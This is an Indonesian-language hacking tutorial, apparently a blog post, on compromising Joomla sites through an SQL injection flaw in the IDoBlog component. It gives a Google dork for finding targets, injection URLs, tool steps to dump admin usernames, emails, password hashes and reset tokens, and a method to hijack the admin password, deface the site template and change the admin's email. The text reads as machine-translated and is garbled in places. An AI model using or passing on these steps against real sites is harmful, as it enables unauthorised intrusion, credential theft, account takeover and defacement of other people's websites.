Mini Niche Scraper Banner 468x60

Tutorial Joomla (Hacking)



Pendahuluan: Joomla! sebagai Stabil-Kendali Paket mungkin unhackable dan
Jika seseorang mengatakan bahwa Joomla HACKED sampah, bicara!
Namun orang masih hack situs yang menggunakan Joomla sebagai Content Management System?!?
Joomla terbuat dari komponen dan modul, dan ada beberapa pengembang terpisah dari
tim resmi yang menawarkan solusi untuk meningkatkan Joomla.
Itu komponen dan modul mede oleh pengembang yang lain titik-titik lemah!

Aku meng-hack situs yang menggunakan Joomla! v1.5.6 dan setelah itu v1.5.9 melalui IDoBlog v1.1, tapi aku tidak bisa mengatakan bahwa saya hack Joomla!

Mencari Exploit Dan Target: Kedua langkah bisa masuk urutan yang berbeda, tergantung apa yang Anda temukan target pertama atau mengeksploitasi ...

Google dork: inurl: "option = com_idoblog"
Datang dengan hasil untuk sekitar 140.000 halaman

Joomla Komponen idoblog 1.1b30 (com_idoblog) SQL Injection Vulnrablity

Eksploitasi dapat dipisahkan dalam dua bagian:

Bagian I
index.php option = com_idoblog & tugas? = profile & Itemid = 1.337 & userid = 62
Bagian ini membuka halaman blog Admin dan jika halaman Admin tidak ada, mengeksploitasi tidak akan bekerja (tidak sepenuhnya dikonfirmasi)

Bagian II


Bagian ini mencari username dan password dari tabel jos_users

Pengujian Kerentanan

Nonaktifkan gambar untuk loading halaman lebih cepat:
[Firefox]
Tools >> Options >> Content (menu tab) >> dan 'Muat gambar secara otomatis' unclick

Pergi ke:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Situs beban normal ...

Pergi ke:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Situs konten blog Profile Admin

Pergi ke:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--
Situs rentan

Inject Sasaran

Buka reiluke SQLiHelper 2.7
Dalam copy Sasaran

http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
dan klik Inject
Ikuti langkah-langkah standar sampai Anda menemukan Nama Kolom, sebagai akibat yang kita miliki

Perhatikan bahwa mengeksploitasi dari inj3ct0r tidak akan bekerja di sini karena mencari meja jos_users dan seperti yang Anda lihat
target kami menggunakan jos153_users tabel untuk menyimpan data

Biarkan Dump nama pengguna, email, password dari jos153_users Nama Kolom. Klik pada Dump Now

username: admin
email: info@site.com
sandi: 169fad83bb2ac775bbaef4938d504f4e: mlqMfY0Vc9KLxPk056eewFWM13vEThJI

Joomla! 1.5.x menggunakan md5 hash untuk password. Ketika password yang dibuat, mereka hashed dengan
32 Karakter garam yang ditambahkan ke akhir dari string password. Sandi akan disimpan sebagai
{TOTAL Hash}: {} SALT ORIGINAL. Jadi untuk hack bahwa password memakan waktu dan waktu ...

Cara termudah untuk hack adalah untuk mereset password Admin!

Admin Password Reset

Pergi ke:
http://www.site.com/index.php?option=com_user&view=reset
Ini adalah standar Joomla! query untuk permintaan reset password

Lupa Password Anda? Halaman akan memuat.
Dalam E-mail Address: masukkan email admin (dalam kasus kami itu adalah: info@site.com) dan tekan Submit.
Jika Anda menemukan email yang tepat admin, Konfirmasikan akun Anda. halaman akan memuat, meminta Token:

Mencari Token

Untuk menemukan tanda kembali ke reiluke SQLiHelper 2,7 dan username sampah dan aktivasi dari jos153_users Nama Kolom

username: admin
aktivasi: 5482dd177624761a290224270fa55f1d

5482dd177624761a290224270fa55f1d adalah 32 Token verivikasi char, masuk dan pres Kirim.

Jika Anda melakukan semuanya ok, Istirahatkan halaman Password akan memuat. Masukkan password baru anda ...

Setelah itu pergi ke:
http://www.site.com/administrator/
Standar Joomla konten portal sistem manajemen

Masukkan admin username dan password Anda, klik Login
Pergi ke Extensions >> Template Manager >> default Template Nama >> Edit HTML
Dalam Editor Template HTML memasukkan kode dirusak Anda, klik Terapkan, Simpan dan Anda selesai!

Untuk membuat hidup lebih sengsara admin, klik admin di jendela Joomla utama dan di halaman Rincian Pengguna perubahan E-mail admin

Sekian Semoga Bermanfaat .!!